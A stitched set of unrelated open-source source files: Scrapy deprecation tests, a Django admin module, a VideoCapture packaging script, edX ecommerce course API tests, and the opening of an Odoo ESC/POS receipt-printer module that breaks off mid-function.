Deprecated = create_deprecated_class('Deprecated', NewName,
warn_category=MyWarning)
# ignore subclassing warnings
with warnings.catch_warnings():
warnings.simplefilter('ignore', ScrapyDeprecationWarning)
class UserClass(Deprecated):
pass
with warnings.catch_warnings(record=True) as w:
_, lineno = Deprecated(), inspect.getlineno(inspect.currentframe())
_ = UserClass() # subclass instances don't warn
w = self._mywarnings(w)
self.assertEqual(len(w), 1)
self.assertEqual(
str(w[0].message),
"tests.test_utils_deprecate.Deprecated is deprecated, "
"instantiate tests.test_utils_deprecate.NewName instead."
)
self.assertEqual(w[0].lineno, lineno)
def test_warning_auto_message(self):
with warnings.catch_warnings(record=True) as w:
Deprecated = create_deprecated_class('Deprecated', NewName)
class UserClass2(Deprecated):
pass
msg = str(w[0].message)
self.assertIn("tests.test_utils_deprecate.NewName", msg)
self.assertIn("tests.test_utils_deprecate.Deprecated", msg)
def test_issubclass(self):
with warnings.catch_warnings():
warnings.simplefilter('ignore', ScrapyDeprecationWarning)
DeprecatedName = create_deprecated_class('DeprecatedName', NewName)
class UpdatedUserClass1(NewName):
pass
class UpdatedUserClass1a(NewName):
pass
class OutdatedUserClass1(DeprecatedName):
pass
class OutdatedUserClass1a(DeprecatedName):
pass
class UnrelatedClass(object):
pass
class OldStyleClass:
pass
assert issubclass(UpdatedUserClass1, NewName)
assert issubclass(UpdatedUserClass1a, NewName)
assert issubclass(UpdatedUserClass1, DeprecatedName)
assert issubclass(UpdatedUserClass1a, DeprecatedName)
assert issubclass(OutdatedUserClass1, DeprecatedName)
assert not issubclass(UnrelatedClass, DeprecatedName)
assert not issubclass(OldStyleClass, DeprecatedName)
assert not issubclass(OldStyleClass, DeprecatedName)
assert not issubclass(OutdatedUserClass1, OutdatedUserClass1a)
assert not issubclass(OutdatedUserClass1a, OutdatedUserClass1)
self.assertRaises(TypeError, issubclass, object(), DeprecatedName)
def test_isinstance(self):
with warnings.catch_warnings():
warnings.simplefilter('ignore', ScrapyDeprecationWarning)
DeprecatedName = create_deprecated_class('DeprecatedName', NewName)
class UpdatedUserClass2(NewName):
pass
class UpdatedUserClass2a(NewName):
pass
class OutdatedUserClass2(DeprecatedName):
pass
class OutdatedUserClass2a(DeprecatedName):
pass
class UnrelatedClass(object):
pass
class OldStyleClass:
pass
assert isinstance(UpdatedUserClass2(), NewName)
assert isinstance(UpdatedUserClass2a(), NewName)
assert isinstance(UpdatedUserClass2(), DeprecatedName)
assert isinstance(UpdatedUserClass2a(), DeprecatedName)
assert isinstance(OutdatedUserClass2(), DeprecatedName)
assert isinstance(OutdatedUserClass2a(), DeprecatedName)
assert not isinstance(OutdatedUserClass2a(), OutdatedUserClass2)
assert not isinstance(OutdatedUserClass2(), OutdatedUserClass2a)
assert not isinstance(UnrelatedClass(), DeprecatedName)
assert not isinstance(OldStyleClass(), DeprecatedName)
def test_clsdict(self):
with warnings.catch_warnings():
warnings.simplefilter('ignore', ScrapyDeprecationWarning)
Deprecated = create_deprecated_class('Deprecated', NewName, {'foo': 'bar'})
self.assertEqual(Deprecated.foo, 'bar')
def test_deprecate_a_class_with_custom_metaclass(self):
Meta1 = type('Meta1', (type,), {})
New = Meta1('New', (), {})
Deprecated = create_deprecated_class('Deprecated', New)
def test_deprecate_subclass_of_deprecated_class(self):
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
Deprecated = create_deprecated_class('Deprecated', NewName,
warn_category=MyWarning)
AlsoDeprecated = create_deprecated_class('AlsoDeprecated', Deprecated,
new_class_path='foo.Bar',
warn_category=MyWarning)
w = self._mywarnings(w)
self.assertEqual(len(w), 0, str(map(str, w)))
with warnings.catch_warnings(record=True) as w:
AlsoDeprecated()
class UserClass(AlsoDeprecated):
pass
w = self._mywarnings(w)
self.assertEqual(len(w), 2)
self.assertIn('AlsoDeprecated', str(w[0].message))
self.assertIn('foo.Bar', str(w[0].message))
self.assertIn('AlsoDeprecated', str(w[1].message))
self.assertIn('foo.Bar', str(w[1].message))
def test_inspect_stack(self):
with mock.patch('inspect.stack', side_effect=IndexError):
with warnings.catch_warnings(record=True) as w:
DeprecatedName = create_deprecated_class('DeprecatedName', NewName)
class SubClass(DeprecatedName):
pass
self.assertIn("Error detecting parent module", str(w[0].message))
@mock.patch('scrapy.utils.deprecate.DEPRECATION_RULES',
[('scrapy.contrib.pipeline.', 'scrapy.pipelines.'),
('scrapy.contrib.', 'scrapy.extensions.')])
class UpdateClassPathTest(unittest.TestCase):
def test_old_path_gets_fixed(self):
with warnings.catch_warnings(record=True) as w:
output = update_classpath('scrapy.contrib.debug.Debug')
self.assertEqual(output, 'scrapy.extensions.debug.Debug')
self.assertEqual(len(w), 1)
self.assertIn("scrapy.contrib.debug.Debug", str(w[0].message))
self.assertIn("scrapy.extensions.debug.Debug", str(w[0].message))
def test_sorted_replacement(self):
with warnings.catch_warnings():
warnings.simplefilter('ignore', ScrapyDeprecationWarning)
output = update_classpath('scrapy.contrib.pipeline.Pipeline')
self.assertEqual(output, 'scrapy.pipelines.Pipeline')
def test_unmatched_path_stays_the_same(self):
with warnings.catch_warnings(record=True) as w:
output = update_classpath('scrapy.unmatched.Path')
self.assertEqual(output, 'scrapy.unmatched.Path')
self.assertEqual(len(w), 0)
| bsd-3-clause |
night-crawler/rfnumplan | admin.py | 1 | 1304 | # -*- coding: utf-8 -*-
from django.contrib import admin
from .models import Operator, Region, NumberingPlan, NumberingPlanRange
class OperatorAdmin(admin.ModelAdmin):
list_display = ('id', 'name')
search_fields = ('name',)
admin.site.register(Operator, OperatorAdmin)
class RegionAdmin(admin.ModelAdmin):
list_display = ('id', 'name')
search_fields = ('name',)
admin.site.register(Region, RegionAdmin)
class NumberingPlanAdmin(admin.ModelAdmin):
list_display = (
'id',
'name',
'prefix',
'plan_uri',
'loaded',
'last_modified',
)
list_filter = ('last_modified', 'loaded')
search_fields = ('name',)
admin.site.register(NumberingPlan, NumberingPlanAdmin)
class NumberingPlanRangeAdmin(admin.ModelAdmin):
list_display = (
'id',
'numbering_plan',
'prefix',
'range_start',
'range_end',
'range_capacity',
'operator',
'region',
)
raw_id_fields = ('numbering_plan', 'operator', 'region')
list_filter = ('numbering_plan__name',)
def get_queryset(self, request):
return super(NumberingPlanRangeAdmin, self).get_queryset(request).select_related('region', 'operator')
admin.site.register(NumberingPlanRange, NumberingPlanRangeAdmin)
| mit |
krintoxi/NoobSec-Toolkit | NoobSecToolkit /scripts/sshbackdoors/backdoors/shell/pupy/pupy/packages/src/VideoCapture/src/mkdist.py | 8 | 8852 | version = '0.9-2'
###############################################################################
print '- exportashtml'
import os
if os.name == 'nt':
scite = r'C:\Programme\wscite\SciTE.exe'
else:
scite = '/iuehome/gritsch/bin/scite'
file = 'VideoCapture.py'
src = './' + file
dest = '../html/' + file + '.html'
os.system(scite + ' -open:%s -exportashtml:%s -quit:' % (src, dest))
###############################################################################
print '- fixhtmlfile'
import time, fixhtml
time.sleep(1) # allow SciTE to finish writing
fixhtml.fixhtmlfile(dest)
###############################################################################
print '- pydoc_it'
os.system(r'c:\Python22\python.exe c:\Python22\Lib\pydoc.py -w VideoCapture ')
os.system('move VideoCapture.html ..\html\ ')
os.remove('VideoCapture.pyc')
###############################################################################
print '- fixpydochtmlfile'
import string
file = '../html/VideoCapture.html'
fp = open(file)
cont = fp.read()
fp.close()
cont = string.replace(cont, '\r\n', '\n')
cont = string.replace(cont, '''<style type="text/css"><!--
TT { font-family: lucidatypewriter, lucida console, courier }
--></style>''', '''<style type="text/css"><!--
TT { font-family: courier new }
--></style>''')
cont = string.replace(cont, 'face="helvetica, arial"', 'face="verdana"')
cont = string.replace(cont, r'<a href=".">index</a><br><a href="file:///D|/home/python/vidcap/videocapture-' + version + r'/src/videocapture.py">d:\home\python\vidcap\videocapture-' + version + r'\src\videocapture.py</a>', '<a href="../index.html">index.html</a><br><a href="VideoCapture.py.html">VideoCapture.py</a>')
fp = open(file, 'wt')
fp.write(cont)
fp.close()
###############################################################################
print '- zip_it'
import zipfile
archive = zipfile.ZipFile('../VideoCapture-' + version + '.zip', 'w', zipfile.ZIP_DEFLATED)
archive.write('../LGPL.txt', 'LGPL.txt')
archive.write('../index.html', 'index.html')
archive.write('../html/logo.jpg', 'html/logo.jpg')
archive.write('../html/PythonPowered.gif', 'html/PythonPowered.gif')
archive.write('../html/VideoCapture.py.html', 'html/VideoCapture.py.html')
archive.write('../html/VideoCapture.html', 'html/VideoCapture.html')
archive.write('mkdist.py', 'src/mkdist.py')
archive.write('fixhtml.py', 'src/fixhtml.py')
archive.write('vidcap.dsp', 'src/vidcap.dsp')
archive.write('vidcap.dsw', 'src/vidcap.dsw')
archive.write('vidcapmodule.cpp', 'src/vidcapmodule.cpp')
archive.write('VideoCapture.py', 'src/VideoCapture.py')
archive.write('helvB08.png', 'src/helvB08.png')
archive.write('helvB08.pil', 'src/helvB08.pil')
archive.write('helvetica-10.png', 'src/helvetica-10.png')
archive.write('helvetica-10.pil', 'src/helvetica-10.pil')
archive.write('VideoCapture.py', 'Python20/Lib/VideoCapture.py')
archive.write('helvB08.png', 'Python20/Lib/helvB08.png')
archive.write('helvB08.pil', 'Python20/Lib/helvB08.pil')
archive.write('helvetica-10.png', 'Python20/Lib/helvetica-10.png')
archive.write('helvetica-10.pil', 'Python20/Lib/helvetica-10.pil')
archive.write('VideoCapture.py', 'Python21/Lib/VideoCapture.py')
archive.write('helvB08.png', 'Python21/Lib/helvB08.png')
archive.write('helvB08.pil', 'Python21/Lib/helvB08.pil')
archive.write('helvetica-10.png', 'Python21/Lib/helvetica-10.png')
archive.write('helvetica-10.pil', 'Python21/Lib/helvetica-10.pil')
archive.write('VideoCapture.py', 'Python22/Lib/VideoCapture.py')
archive.write('helvB08.png', 'Python22/Lib/helvB08.png')
archive.write('helvB08.pil', 'Python22/Lib/helvB08.pil')
archive.write('helvetica-10.png', 'Python22/Lib/helvetica-10.png')
archive.write('helvetica-10.pil', 'Python22/Lib/helvetica-10.pil')
archive.write('VideoCapture.py', 'Python23/Lib/VideoCapture.py')
archive.write('helvB08.png', 'Python23/Lib/helvB08.png')
archive.write('helvB08.pil', 'Python23/Lib/helvB08.pil')
archive.write('helvetica-10.png', 'Python23/Lib/helvetica-10.png')
archive.write('helvetica-10.pil', 'Python23/Lib/helvetica-10.pil')
archive.write('VideoCapture.py', 'Python24/Lib/VideoCapture.py')
archive.write('helvB08.png', 'Python24/Lib/helvB08.png')
archive.write('helvB08.pil', 'Python24/Lib/helvB08.pil')
archive.write('helvetica-10.png', 'Python24/Lib/helvetica-10.png')
archive.write('helvetica-10.pil', 'Python24/Lib/helvetica-10.pil')
archive.write('VideoCapture.py', 'Python25/Lib/VideoCapture.py')
archive.write('helvB08.png', 'Python25/Lib/helvB08.png')
archive.write('helvB08.pil', 'Python25/Lib/helvB08.pil')
archive.write('helvetica-10.png', 'Python25/Lib/helvetica-10.png')
archive.write('helvetica-10.pil', 'Python25/Lib/helvetica-10.pil')
archive.write('VideoCapture.py', 'Python26/Lib/VideoCapture.py')
archive.write('helvB08.png', 'Python26/Lib/helvB08.png')
archive.write('helvB08.pil', 'Python26/Lib/helvB08.pil')
archive.write('helvetica-10.png', 'Python26/Lib/helvetica-10.png')
archive.write('helvetica-10.pil', 'Python26/Lib/helvetica-10.pil')
archive.write('Python20/vidcap.pyd', 'Python20/DLLs/vidcap.pyd')
archive.write('Python21/vidcap.pyd', 'Python21/DLLs/vidcap.pyd')
archive.write('Python22/vidcap.pyd', 'Python22/DLLs/vidcap.pyd')
archive.write('Python23/vidcap.pyd', 'Python23/DLLs/vidcap.pyd')
archive.write('Python24/vidcap.dll', 'Python24/DLLs/vidcap.dll')
archive.write('Python25/vidcap.pyd', 'Python25/DLLs/vidcap.pyd')
archive.write('Python26/vidcap.pyd', 'Python26/DLLs/vidcap.pyd')
archive.write('../AMCAP/AMCAP.EXE', 'AMCAP/AMCAP.EXE')
archive.write('../AMCAP/AMCAP.DOC', 'AMCAP/AMCAP.DOC')
archive.write('../Examples/exa1_snapshot.py', 'Examples/exa1_snapshot.py')
archive.write('../Examples/exa2_show-possibilities.py', 'Examples/exa2_show-possibilities.py')
archive.write('../Examples/exa3_observer.py', 'Examples/exa3_observer.py')
archive.write('../Examples/displayPropertiesDev0.pyw', 'Examples/displayPropertiesDev0.pyw')
archive.write('../Examples/displayPropertiesDev1.pyw', 'Examples/displayPropertiesDev1.pyw')
archive.write('../Examples/test1.jpg', 'Examples/test1.jpg')
archive.write('../Examples/test2.jpg', 'Examples/test2.jpg')
archive.write('../Examples/test3.jpg', 'Examples/test3.jpg')
archive.write('../Examples/test4.jpg', 'Examples/test4.jpg')
archive.write('../Tools/readme.txt', 'Tools/readme.txt')
archive.write('../Tools/webcam-saver/webcam-saver.py', 'Tools/webcam-saver/webcam-saver.py')
archive.write('../Tools/webcam-saver/webcam-saver.ini', 'Tools/webcam-saver/webcam-saver.ini')
archive.write('../Tools/webcam-uploader/webcam-uploader.py', 'Tools/webcam-uploader/webcam-uploader.py')
archive.write('../Tools/webcam-uploader/webcam-uploader.ini', 'Tools/webcam-uploader/webcam-uploader.ini')
archive.write('../Tools/webcam-uploader/scpdropin.py', 'Tools/webcam-uploader/scpdropin.py')
archive.write('../Tools/webcam-uploader/template.html', 'Tools/webcam-uploader/template.html')
archive.write('../Tools/webcam-uploader/offline.jpg', 'Tools/webcam-uploader/offline.jpg')
archive.write('../Tools/webcam-uploader/offline2.jpg', 'Tools/webcam-uploader/offline2.jpg')
archive.write('../Tools/webcam-watcher/cam_form.ui', 'Tools/webcam-watcher/cam_form.ui')
archive.write('../Tools/webcam-watcher/cam_form.py', 'Tools/webcam-watcher/cam_form.py')
archive.write('../Tools/webcam-watcher/webcam-watcher.py', 'Tools/webcam-watcher/webcam-watcher.py')
archive.write('../Tools/webcam-watcher/webcam-watcher.ini', 'Tools/webcam-watcher/webcam-watcher.ini')
archive.write('../Tools/webcam-watcher/cam.png', 'Tools/webcam-watcher/cam.png')
archive.write('../Tools/webcam-watcher/cam256.ico', 'Tools/webcam-watcher/cam256.ico')
archive.write('../Tools/webcam-watcher/retrieving.png', 'Tools/webcam-watcher/retrieving.png')
archive.write('../Tools/webcam-watcher/error.png', 'Tools/webcam-watcher/error.png')
archive.write('../Tools/webcam-watcher/setup.py', 'Tools/webcam-watcher/setup.py')
archive.write('../Tools/webcam-watcher/makedist.bat', 'Tools/webcam-watcher/makedist.bat')
archive.write('../Tools/3rdParty/webcam-server/email.txt', 'Tools/3rdParty/webcam-server/email.txt')
archive.write('../Tools/3rdParty/webcam-server/webcam-server.py', 'Tools/3rdParty/webcam-server/webcam-server.py')
archive.write('../Tools/3rdParty/webcam-server/webcam-server.ini', 'Tools/3rdParty/webcam-server/webcam-server.ini')
archive.write('../Tools/3rdParty/pushserver/email.txt', 'Tools/3rdParty/pushserver/email.txt')
archive.write('../Tools/3rdParty/pushserver/server.py', 'Tools/3rdParty/pushserver/server.py')
archive.write('../Tools/3rdParty/pushserver/index.html', 'Tools/3rdParty/pushserver/index.html')
archive.write('../Tools/3rdParty/pushserver/test_push.html', 'Tools/3rdParty/pushserver/test_push.html')
archive.write('../Tools/3rdParty/pushserver/test_static.html', 'Tools/3rdParty/pushserver/test_static.html')
archive.close()
| gpl-2.0 |
mferenca/HMS-ecommerce | ecommerce/extensions/api/v2/tests/views/test_courses.py | 1 | 8632 | from __future__ import unicode_literals
import json
import jwt
import mock
from django.conf import settings
from django.contrib.auth import get_user_model
from django.core.urlresolvers import reverse
from oscar.core.loading import get_model, get_class
from ecommerce.core.constants import ISO_8601_FORMAT
from ecommerce.core.tests import toggle_switch
from ecommerce.courses.models import Course
from ecommerce.courses.publishers import LMSPublisher
from ecommerce.extensions.api.v2.tests.views import JSON_CONTENT_TYPE, ProductSerializerMixin
from ecommerce.extensions.catalogue.tests.mixins import CourseCatalogTestMixin
from ecommerce.tests.testcases import TestCase
Product = get_model('catalogue', 'Product')
ProductClass = get_model('catalogue', 'ProductClass')
Selector = get_class('partner.strategy', 'Selector')
User = get_user_model()
class CourseViewSetTests(ProductSerializerMixin, CourseCatalogTestMixin, TestCase):
maxDiff = None
list_path = reverse('api:v2:course-list')
def setUp(self):
super(CourseViewSetTests, self).setUp()
self.user = self.create_user(is_staff=True)
self.client.login(username=self.user.username, password=self.password)
self.course = self.create_course()
def create_course(self):
return Course.objects.create(id='edX/DemoX/Demo_Course', name='Test Course')
def serialize_course(self, course, include_products=False):
""" Serializes a course to a Python dict. """
products_url = self.get_full_url(reverse('api:v2:course-product-list',
kwargs={'parent_lookup_course_id': course.id}))
last_edited = course.history.latest().history_date.strftime(ISO_8601_FORMAT)
data = {
'id': course.id,
'name': course.name,
'verification_deadline': course.verification_deadline,
'type': course.type,
'url': self.get_full_url(reverse('api:v2:course-detail', kwargs={'pk': course.id})),
'products_url': products_url,
'last_edited': last_edited
}
if include_products:
data['products'] = [self.serialize_product(product) for product in course.products.all()]
return data
def test_staff_authorization(self):
""" Verify the endpoint is not accessible to non-staff users. """
self.client.logout()
response = self.client.get(self.list_path)
self.assertEqual(response.status_code, 401)
user = self.create_user()
self.client.login(username=user.username, password=self.password)
response = self.client.get(self.list_path)
self.assertEqual(response.status_code, 403)
def test_jwt_authentication(self):
""" Verify the endpoint supports JWT authentication and user creation. """
username = 'some-user'
email = 'some-user@example.com'
payload = {
'administrator': True,
'username': username,
'email': email,
'iss': settings.JWT_AUTH['JWT_ISSUERS'][0]
}
auth_header = "JWT {token}".format(token=jwt.encode(payload, settings.JWT_AUTH['JWT_SECRET_KEY']))
self.assertFalse(User.objects.filter(username=username).exists())
response = self.client.get(
self.list_path,
HTTP_AUTHORIZATION=auth_header
)
self.assertEqual(response.status_code, 200)
user = User.objects.latest()
self.assertEqual(user.username, username)
self.assertEqual(user.email, email)
self.assertTrue(user.is_staff)
def test_list(self):
""" Verify the view returns a list of Courses. """
response = self.client.get(self.list_path)
self.assertEqual(response.status_code, 200)
self.assertListEqual(json.loads(response.content)['results'], [self.serialize_course(self.course)])
# If no Courses exist, the view should return an empty results list.
Course.objects.all().delete()
response = self.client.get(self.list_path)
self.assertDictEqual(json.loads(response.content), {'count': 0, 'next': None, 'previous': None, 'results': []})
def test_create(self):
""" Verify the view can create a new Course."""
Course.objects.all().delete()
course_id = 'edX/DemoX/Demo_Course'
course_name = 'Test Course'
data = {
'id': course_id,
'name': course_name
}
response = self.client.post(self.list_path, json.dumps(data), JSON_CONTENT_TYPE)
self.assertEqual(response.status_code, 201)
# Verify Course exists
course = Course.objects.get(id=course_id)
self.assertEqual(course.name, course_name)
# Ensure the parent and child seats were created
self.assertEqual(course.products.count(), 1)
# Validate the parent seat
seat_product_class = ProductClass.objects.get(slug='seat')
parent = course.parent_seat_product
self.assertEqual(parent.structure, Product.PARENT)
self.assertEqual(parent.title, 'Seat in Test Course')
self.assertEqual(parent.get_product_class(), seat_product_class)
self.assertEqual(parent.attr.course_key, course.id)
def test_retrieve(self):
""" Verify the view returns a single course. """
# The view should return a 404 if the course does not exist.
path = reverse('api:v2:course-detail', kwargs={'pk': 'aaa/bbb/ccc'})
response = self.client.get(path)
self.assertEqual(response.status_code, 404)
path = reverse('api:v2:course-detail', kwargs={'pk': self.course.id})
response = self.client.get(path)
self.assertEqual(response.status_code, 200)
self.assertDictEqual(json.loads(response.content), self.serialize_course(self.course))
# Verify nested products can be included
response = self.client.get(path + '?include_products=true')
self.assertEqual(response.status_code, 200)
self.assertDictEqual(json.loads(response.content), self.serialize_course(self.course, include_products=True))
def test_update(self):
""" Verify the view updates the information of existing courses. """
course_id = self.course.id
path = reverse('api:v2:course-detail', kwargs={'pk': course_id})
name = 'Something awesome!'
response = self.client.put(path, json.dumps({'id': course_id, 'name': name}), JSON_CONTENT_TYPE)
self.assertEqual(response.status_code, 200, response.content)
# Reload the Course
self.course = Course.objects.get(id=course_id)
self.assertEqual(self.course.name, name)
self.assertDictEqual(json.loads(response.content), self.serialize_course(self.course))
def test_destroy(self):
""" Verify the view does NOT allow courses to be destroyed. """
course_id = self.course.id
path = reverse('api:v2:course-detail', kwargs={'pk': course_id})
response = self.client.delete(path)
self.assertEqual(response.status_code, 405)
self.assertTrue(Course.objects.filter(id=course_id).exists())
def assert_publish_response(self, response, status_code, msg):
self.assertEqual(response.status_code, status_code)
self.assertDictEqual(json.loads(response.content), {'status': msg.format(course_id=self.course.id)})
def test_publish(self):
""" Verify the view publishes course data to LMS. """
course_id = self.course.id
path = reverse('api:v2:course-publish', kwargs={'pk': course_id})
# Method should return a 500 if the switch is inactive
toggle_switch('publish_course_modes_to_lms', False)
response = self.client.post(path)
msg = 'Course [{course_id}] was not published to LMS ' \
'because the switch [publish_course_modes_to_lms] is disabled.'
self.assert_publish_response(response, 500, msg)
toggle_switch('publish_course_modes_to_lms', True)
with mock.patch.object(LMSPublisher, 'publish') as mock_publish:
# If publish fails, return a 500
mock_publish.return_value = False
response = self.client.post(path)
self.assert_publish_response(response, 500, 'An error occurred while publishing [{course_id}] to LMS.')
# If publish succeeds, return a 200
mock_publish.return_value = True
response = self.client.post(path)
self.assert_publish_response(response, 200, 'Course [{course_id}] was successfully published to LMS.')
| agpl-3.0 |
mihailignatenko/erp | addons/hw_escpos/escpos/escpos.py | 65 | 31673 | # -*- coding: utf-8 -*-
import time
import copy
import io
import base64
import math
import md5
import re
import traceback
import xml.etree.ElementTree as ET
import xml.dom.minidom as minidom
from PIL import Image
try:
import jcconv
except ImportError:
jcconv = None
try:
import qrcode
except ImportError:
qrcode = None
from constants import *
from exceptions import *
def utfstr(stuff):
""" converts stuff to string and does without failing if stuff is a utf8 string """
if isinstance(stuff,basestring):
return stuff
else:
return str(stuff)
class StyleStack:
"""
The stylestack is used by the xml receipt serializer to compute the active styles along the xml
document. Styles are just xml attributes, there is no css mechanism. But the style applied by
the attributes are inherited by deeper nodes.
"""
def __init__(self):
self.stack = []
self.defaults = { # default style values
'align': 'left',
'underline': 'off',
'bold': 'off',
'size': 'normal',
'font' : 'a',
'width': 48,
'indent': 0,
'tabwidth': 2,
'bullet': ' - ',
'line-ratio':0.5,
'color': 'black',
'value-decimals': 2,
'value-symbol': '',
'value-symbol-position': 'after',
'value-autoint': 'off',
'value-decimals-separator': '.',
'value-thousands-separator': ',',
'value-width': 0,
}
self.types = { # attribute types, default is string and can be ommitted
'width': 'int',
'indent': 'int',
'tabwidth': 'int',
'line-ratio': 'float',
'value-decimals': 'int',
'value-width': 'int',
}
self.cmds = {
# translation from styles to escpos commands
# some style do not correspond to escpos command are used by
# the serializer instead
'align': {
'left': TXT_ALIGN_LT,
'right': TXT_ALIGN_RT,
'center': TXT_ALIGN_CT,
'_order': 1,
},
'underline': {
'off': TXT_UNDERL_OFF,
'on': TXT_UNDERL_ON,
'double': TXT_UNDERL2_ON,
# must be issued after 'size' command
# because ESC ! resets ESC -
'_order': 10,
},
'bold': {
'off': TXT_BOLD_OFF,
'on': TXT_BOLD_ON,
# must be issued after 'size' command
# because ESC ! resets ESC -
'_order': 10,
},
'font': {
'a': TXT_FONT_A,
'b': TXT_FONT_B,
# must be issued after 'size' command
# because ESC ! resets ESC -
'_order': 10,
},
'size': {
'normal': TXT_NORMAL,
'double-height': TXT_2HEIGHT,
'double-width': TXT_2WIDTH,
'double': TXT_DOUBLE,
'_order': 1,
},
'color': {
'black': TXT_COLOR_BLACK,
'red': TXT_COLOR_RED,
'_order': 1,
},
}
self.push(self.defaults)
def get(self,style):
""" what's the value of a style at the current stack level"""
level = len(self.stack) -1
while level >= 0:
if style in self.stack[level]:
return self.stack[level][style]
else:
level = level - 1
return None
def enforce_type(self, attr, val):
"""converts a value to the attribute's type"""
if not attr in self.types:
return utfstr(val)
elif self.types[attr] == 'int':
return int(float(val))
elif self.types[attr] == 'float':
return float(val)
else:
return utfstr(val)
def push(self, style={}):
"""push a new level on the stack with a style dictionnary containing style:value pairs"""
_style = {}
for attr in style:
if attr in self.cmds and not style[attr] in self.cmds[attr]:
print 'WARNING: ESC/POS PRINTING: ignoring invalid value: '+utfstr(style[attr])+' for style: '+utfstr(attr)
else:
_style[attr] = self.enforce_type(attr, style[attr])
self.stack.append(_style)
def set(self, style={}):
"""overrides style values at the current stack level"""
_style = {}
for attr in style:
if attr in self.cmds and not style[attr] in self.cmds[attr]:
print 'WARNING: ESC/POS PRINTING: ignoring invalid value: '+utfstr(style[attr])+' for style: '+utfstr(attr)
else:
self.stack[-1][attr] = self.enforce_type(attr, style[attr])
def pop(self):
""" pop a style stack level """
if len(self.stack) > 1 :
self.stack = self.stack[:-1]
def to_escpos(self):
""" converts the current style to an escpos command string """
cmd = ''
ordered_cmds = self.cmds.keys()
ordered_cmds.sort(lambda x,y: cmp(self.cmds[x]['_order'], self.cmds[y]['_order']))
for style in ordered_cmds:
cmd += self.cmds[style][self.get(style)]
return cmd
class XmlSerializer:
"""
Converts the xml inline / block tree structure to a string,
keeping track of newlines and spacings.
The string is outputted asap to the provided escpos driver.
"""
def __init__(self,escpos):
self.escpos = escpos
self.stack = ['block']
self.dirty = False
def start_inline(self,stylestack=None):
""" starts an inline entity with an optional style definition """
self.stack.append('inline')
if self.dirty:
self.escpos._raw(' ')
if stylestack:
self.style(stylestack)
def start_block(self,stylestack=None):
""" starts a block entity with an optional style definition """
if self.dirty:
self.escpos._raw('\n')
self.dirty = False
self.stack.append('block')
if stylestack:
self.style(stylestack)
def end_entity(self):
""" ends the entity definition. (but does not cancel the active style!) """
if self.stack[-1] == 'block' and self.dirty:
self.escpos._raw('\n')
self.dirty = False
if len(self.stack) > 1:
self.stack = self.stack[:-1]
def pre(self,text):
""" puts a string of text in the entity keeping the whitespace intact """
if text:
self.escpos.text(text)
self.dirty = True
def text(self,text):
""" puts text in the entity. Whitespace and newlines are stripped to single spaces. """
if text:
text = utfstr(text)
text = text.strip()
text = re.sub('\s+',' ',text)
if text:
self.dirty = True
self.escpos.text(text)
def linebreak(self):
""" inserts a linebreak in the entity """
self.dirty = False
self.escpos._raw('\n')
def style(self,stylestack):
""" apply a style to the entity (only applies to content added after the definition) """
self.raw(stylestack.to_escpos())
def raw(self,raw):
""" puts raw text or escpos command in the entity without affecting the state of the serializer """
self.escpos._raw(raw)
class XmlLineSerializer:
"""
This is used to convert a xml tree into a single line, with a left and a right part.
The content is not output to escpos directly, and is intended to be fedback to the
XmlSerializer as the content of a block entity.
"""
def __init__(self, indent=0, tabwidth=2, width=48, ratio=0.5):
self.tabwidth = tabwidth
self.indent = indent
self.width = max(0, width - int(tabwidth*indent))
self.lwidth = int(self.width*ratio)
self.rwidth = max(0, self.width - self.lwidth)
self.clwidth = 0
self.crwidth = 0
self.lbuffer = ''
self.rbuffer = ''
self.left = True
def _txt(self,txt):
if self.left:
if self.clwidth < self.lwidth:
txt = txt[:max(0, self.lwidth - self.clwidth)]
self.lbuffer += txt
self.clwidth += len(txt)
else:
if self.crwidth < self.rwidth:
txt = txt[:max(0, self.rwidth - self.crwidth)]
self.rbuffer += txt
self.crwidth += len(txt)
def start_inline(self,stylestack=None):
if (self.left and self.clwidth) or (not self.left and self.crwidth):
self._txt(' ')
def start_block(self,stylestack=None):
self.start_inline(stylestack)
def end_entity(self):
pass
def pre(self,text):
if text:
self._txt(text)
def text(self,text):
if text:
text = utfstr(text)
text = text.strip()
text = re.sub('\s+',' ',text)
if text:
self._txt(text)
def linebreak(self):
pass
def style(self,stylestack):
pass
def raw(self,raw):
pass
def start_right(self):
self.left = False
def get_line(self):
return ' ' * self.indent * self.tabwidth + self.lbuffer + ' ' * (self.width - self.clwidth - self.crwidth) + self.rbuffer
class Escpos:
""" ESC/POS Printer object """
device = None
encoding = None
img_cache = {}
def _check_image_size(self, size):
""" Check and fix the size of the image to 32 bits """
if size % 32 == 0:
return (0, 0)
else:
image_border = 32 - (size % 32)
if (image_border % 2) == 0:
return (image_border / 2, image_border / 2)
else:
return (image_border / 2, (image_border / 2) + 1)
def _print_image(self, line, size):
""" Print formatted image """
i = 0
cont = 0
buffer = ""
self._raw(S_RASTER_N)
buffer = "%02X%02X%02X%02X" % (((size[0]/size[1])/8), 0, size[1], 0)
self._raw(buffer.decode('hex'))
buffer = ""
while i < len(line):
hex_string = int(line[i:i+8],2)
buffer += "%02X" % hex_string
i += 8
cont += 1
if cont % 4 == 0:
self._raw(buffer.decode("hex"))
buffer = ""
cont = 0
def _raw_print_image(self, line, size, output=None ):
""" Print formatted image """
i = 0
cont = 0
buffer = ""
raw = ""
def __raw(string):
if output:
output(string)
else:
self._raw(string)
raw += S_RASTER_N
buffer = "%02X%02X%02X%02X" % (((size[0]/size[1])/8), 0, size[1], 0)
raw += buffer.decode('hex')
buffer = ""
while i < len(line):
hex_string = int(line[i:i+8],2)
buffer += "%02X" % hex_string
i += 8
cont += 1
if cont % 4 == 0:
raw += buffer.decode("hex")
buffer = ""
cont = 0
return raw
def _convert_image(self, im):
""" Parse image and prepare it to a printable format """
pixels = []
pix_line = ""
im_left = ""
im_right = ""
switch = 0
img_size = [ 0, 0 ]
if im.size[0] > 512:
print "WARNING: Image is wider than 512 and could be truncated at print time "
if im.size[1] > 255:
raise ImageSizeError()
im_border = self._check_image_size(im.size[0])
for i in range(im_border[0]):
im_left += "0"
for i in range(im_border[1]):
im_right += "0"
for y in range(im.size[1]):
img_size[1] += 1
pix_line += im_left
img_size[0] += im_border[0]
for x in range(im.size[0]):
img_size[0] += 1
RGB = im.getpixel((x, y))
im_color = (RGB[0] + RGB[1] + RGB[2])
im_pattern = "1X0"
pattern_len = len(im_pattern)
switch = (switch - 1 ) * (-1)
for x in range(pattern_len):
if im_color <= (255 * 3 / pattern_len * (x+1)):
if im_pattern[x] == "X":
pix_line += "%d" % switch
else:
pix_line += im_pattern[x]
break
